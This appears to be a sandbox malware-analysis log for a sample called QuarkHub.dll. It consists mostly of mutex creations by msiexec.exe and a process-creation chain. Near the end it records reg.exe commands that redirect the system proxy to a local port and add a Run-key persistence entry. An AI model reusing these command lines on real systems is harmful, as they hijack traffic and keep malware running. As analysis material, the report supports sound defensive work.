Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{644F9F15-6570-BA0F-2219-A4B3765D1897}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{FD7F1D7D-40B8-8CB7-AA01-6CDB7EC5603F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E3556511-DB3C-FD6B-CED5-30CFE2D96473}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1F617F10-C72F-CAC2-3944-D3167DB8B7AA}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{C402F201-A36C-47DB-7EC5-603F92C994E3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{27F5BB39-2B44-3DD3-167D-B8B7AA016CDB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{618FFAA5-6BC0-EC1F-F2A9-F4C346ED68A7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E2249C75-8350-7E6F-0279-841356BDF8F7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{449793D1-BAFC-DA2B-8E95-F08FA2992433}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{186C3F7E-60C5-5B60-3F92-C994E3E60D08}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DFCA9039-FC44-DAD3-167D-B8B7AA016CDB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F0667EC9-7994-17E3-E60D-08C77A91BCEB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{FB2C963D-E278-4377-6AC1-2C9B3E8520FF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6DDD68F1-4D9C-0C4B-2EB5-90AF42B9C453}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D9710CF9-D204-3593-D63D-78776AC12C9B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{98C123DD-D398-4217-8A61-4C3B5E25409F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{286A5D65-EF80-1CDF-B269-B48306AD2867}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{9EA604F1-399C-084B-2EB5-90AF42B9C453}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A43BDCC5-A760-B33F-92C9-94E3E60D08C7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D70071C9-D094-82E3-E60D-08C77A91BCEB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1759CCA9-ADF4-00C3-46ED-68A7DA711CCB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E282AFAD-CD28-4E67-9A31-DC8B6EF5D0EF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{0A3223FD-9538-D737-2A81-EC5BFE45E0BF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{65ED84E1-58CC-BDBB-DEA5-C01FF2A9F4C3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{55A8248D-FC88-F647-FA11-3C6BCED530CF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{0CA2BF2D-96A8-89E7-1AB1-5C0BEE75506F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{88E15BBD-E9F8-A4F7-EA41-AC1BBE05A07F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{AE2034DD-B098-7B17-8A61-4C3B5E25409F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{68B4AE4D-7B48-E607-BAD1-FC2B8E95F08F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{BE749F29-5E74-F743-C66D-E8275AF19C4B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{FEAFE619-98A4-0BB3-765D-18970AE1CCBB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{8483D181-FCEC-D35B-FE45-E0BF12491463}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{9F803F51-707C-11AB-0E15-700F2219A4B3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6B6CCDC1-4C2C-599B-3E85-20FF528954A3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{9136D801-516C-1DDB-7EC5-603F92C994E3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{ADC9A6A1-8F8C-057B-9E65-80DFB269B483}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F9872B75-C650-E56F-0279-841356BDF8F7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{88743E8D-4E88-2047-FA11-3C6BCED530CF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{63265B75-3650-956F-0279-841356BDF8F7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E950D519-BBA4-D2B3-765D-18970AE1CCBB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{3C42178D-5388-6147-FA11-3C6BCED530CF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{187B8B4D-B448-CB07-BAD1-FC2B8E95F08F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{2FF4A941-71AC-411B-BE05-A07FD209D423}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{BC0B88F5-85D0-9EEF-82F9-0493D63D7877}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DAF863D1-4AFC-2A2B-8E95-F08FA2992433}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1A778451-F17C-9EAB-0E15-700F2219A4B3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D23D4F59-70E4-86F3-B69D-58D74A210CFB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{69DDF1ED-AA68-0AA7-DA71-1CCBAE35102F}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{2804C531-7CDC-F28B-6EF5-D0EF82F90493}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{13C772D5-A630-83CF-E2D9-6473361DD857}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{CAC20D75-4050-176F-0279-841356BDF8F7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{B553F27D-11B8-29B7-AA01-6CDB7EC5603F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{4C1A5AB1-145C-A40B-EE75-506F02798413}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{8C0E1D5D-7F18-F797-0AE1-CCBBDEA5C01F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{11CB79D1-68FC-B02B-8E95-F08FA2992433}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{AA956005-D1A0-587F-D209-D423264D4807}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{20E01189-6D54-F8A3-A6CD-C8873A517CAB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{189F0B98-1A17-708A-614C-3B5E25409F72}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E4F34ADD-CE98-0117-8A61-4C3B5E25409F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6D28F83B-105E-3C25-409F-72297443C66D}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{9B13AB1D-31D8-8B57-CAA1-8C7B9E6580DF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{BF9DE2C9-8D94-1BE3-E60D-08C77A91BCEB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{795FA6D5-4A30-D7CF-E2D9-6473361DD857}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{88D251C5-9860-F03F-92C9-94E3E60D08C7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{C1F7EF05-14A0-BF7F-D209-D423264D4807}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{70FB2099-9124-AA33-F6DD-98178A614C3B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{32D2652A-D281-09EC-5BFE-45E0BF124914}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{B21826E5-2B00-225F-32E9-3403862DA8E7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{8474C789-AB54-1EA3-A6CD-C8873A517CAB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1852D971-041C-50CB-AE35-102FC23944D3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E6150981-D4EC-CB5B-FE45-E0BF12491463}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{567354F5-E1D0-4AEF-82F9-0493D63D7877}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{65225479-7384-6913-56BD-F8F7EA41AC1B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{94548FA9-94F4-BBC3-46ED-68A7DA711CCB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A3783159-EAE4-B8F3-B69D-58D74A210CFB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DE99C79D-A458-5BD7-4A21-0CFB1EE5005F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{32BBD2AD-9428-6967-9A31-DC8B6EF5D0EF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{2D840E11-703C-8E6B-CED5-30CFE2D96473}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{5CBDCE3D-BA78-3B77-6AC1-2C9B3E8520FF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{0C93B535-4510-D52F-C239-44D3167DB8B7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{998C5445-B8E0-96BF-1249-1463668D8847}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{FA525BDD-AB98-3A17-8A61-4C3B5E25409F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{29358DCD-D4C8-7187-3A51-7CAB0E15700F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1352D0A9-E1F4-A4C3-46ED-68A7DA711CCB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D8313A65-2880-01DF-B269-B48306AD2867}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1ADD1C85-6420-C8FF-5289-54A3A6CDC887}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{951FC011-7A3C-106B-CED5-30CFE2D96473}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1D3EADBD-13F8-C6F7-EA41-AC1BBE05A07F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{FC4E54E1-E8CC-0DBB-DEA5-C01FF2A9F4C3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F00FF08D-5888-A247-FA11-3C6BCED530CF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{3582FC19-B6A4-91B3-765D-18970AE1CCBB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DE8ABDA5-52C0-A71F-F2A9-F4C346ED68A7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A70A8B2D-F2A8-35E7-1AB1-5C0BEE75506F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{02B6E219-64A4-67B3-765D-18970AE1CCBB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{638BF3A9-A8F4-BFC3-46ED-68A7DA711CCB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{00BAE915-2770-940F-2219-A4B3765D1897}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{B357F979-D484-5613-56BD-F8F7EA41AC1B}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{57370061-9E4C-453B-5E25-409F72297443}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{EE04ED91-C9BC-19EB-4E55-B04F6259E4F3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{8A031A61-F04C-6F3B-5E25-409F72297443}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{EC08F48D-8C88-4647-FA11-3C6BCED530CF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E086B6A9-8FF4-7AC3-46ED-68A7DA711CCB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{AEEB6545-95E0-CFBF-1249-1463668D8847}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{03E025B9-93C4-8C53-96FD-38372A81EC5B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{0EF5466D-F4E8-D327-5AF1-9C4B2EB590AF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{5B5FE7B9-6DC4-9E53-96FD-38372A81EC5B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{0705625D-0018-8497-0AE1-CCBBDEA5C01F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{B0894B11-893C-D36B-CED5-30CFE2D96473}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1F49B0B9-A2C4-4F53-96FD-38372A81EC5B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{61EE0DDD-B598-BC17-8A61-4C3B5E25409F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6D123889-6854-B7A3-A6CD-C8873A517CAB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{C78DC6D9-8264-6A73-361D-D857CAA18C7B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1156D7A5-A4C0-D11F-F2A9-F4C346ED68A7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{ED9F555D-5718-EF97-0AE1-CCBBDEA5C01F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{4F471C51-A97C-F6AB-0E15-700F2219A4B3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E08E3BA5-B8C0-D51F-F2A9-F4C346ED68A7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{BF3FCF91-43BC-4BEB-4E55-B04F6259E4F3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{12F4BD71-981C-D4CB-AE35-102FC23944D3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F46D7AC9-4594-73E3-E60D-08C77A91BCEB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F792B76D-B1E8-6C27-5AF1-9C4B2EB590AF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D2B1F185-3520-65FF-5289-54A3A6CDC887}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{50DD7D21-740C-9FFB-1EE5-005F32E93403}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F1FCDF99-4424-C133-F6DD-98178A614C3B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{63C7FA92-D8C9-0B94-E3E6-0D08C77A91BC}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F8C38009-09D4-EB23-264D-4807BAD1FC2B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{22676861-E64C-ED3B-5E25-409F72297443}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E9A76355-DCB0-484F-6259-E4F3B69D58D7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D3D3B029-3B74-3043-C66D-E8275AF19C4B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D3087FC1-562C-DB9B-3E85-20FF528954A3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DD68FF01-4C6C-DCDB-7EC5-603F92C994E3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{0908E05D-6618-B297-0AE1-CCBBDEA5C01F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{7A544791-5BBC-83EB-4E55-B04F6259E4F3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6C470821-830C-62FB-1EE5-005F32E93403}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{7894766D-64E8-8327-5AF1-9C4B2EB590AF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{800FB851-957C-F2AB-0E15-700F2219A4B3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6921CB7D-16B8-6AB7-AA01-6CDB7EC5603F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{4B56AF45-57E0-A9BF-1249-1463668D8847}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{BA752825-BB40-F59F-7229-7443C66DE827}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{24054E2D-D9A8-F0E7-1AB1-5C0BEE75506F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1FA03EF5-C3D0-C4EF-82F9-0493D63D7877}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{EB3DC425-A740-F19F-7229-7443C66DE827}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{305A4175-E450-6B6F-0279-841356BDF8F7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{5F9401A1-2E8C-187B-9E65-80DFB269B483}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{0C2E1D01-D26C-AADB-7EC5-603F92C994E3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E4EBC5E1-A5CC-A6BB-DEA5-C01FF2A9F4C3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{48F51E0D-A808-ABC7-7A91-BCEB4E55B04F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{991F3715-1D70-120F-2219-A4B3765D1897}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{CE455D51-F67C-DFAB-0E15-700F2219A4B3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E549D919-EFA4-76B3-765D-18970AE1CCBB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{292683D5-8330-BCCF-E2D9-6473361DD857}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{EC7D96B9-50C4-2553-96FD-38372A81EC5B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D4485255-FFB0-0F4F-6259-E4F3B69D58D7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{167F9249-7714-F763-668D-8847FA113C6B}

Source: C:\Windows\SysWOW64\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\igbe.crt

Jump to behavior

Source: QuarkHub.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\QuarkHub.dll,Kzuhla

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\QuarkHub.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QuarkHub.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\QuarkHub.dll,Kzuhla
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QuarkHub.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /f /t REG_SZ /v "ProxyServer" /d "127.0.0.1:10351"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /f /t REG_DWORD /v "ProxyEnable" /d 1
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v QuarkHub /d "regsvr32.exe /s \"C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll\""
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QuarkHub.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\QuarkHub.dll,Kzuhla	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QuarkHub.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe	Jump to behavior
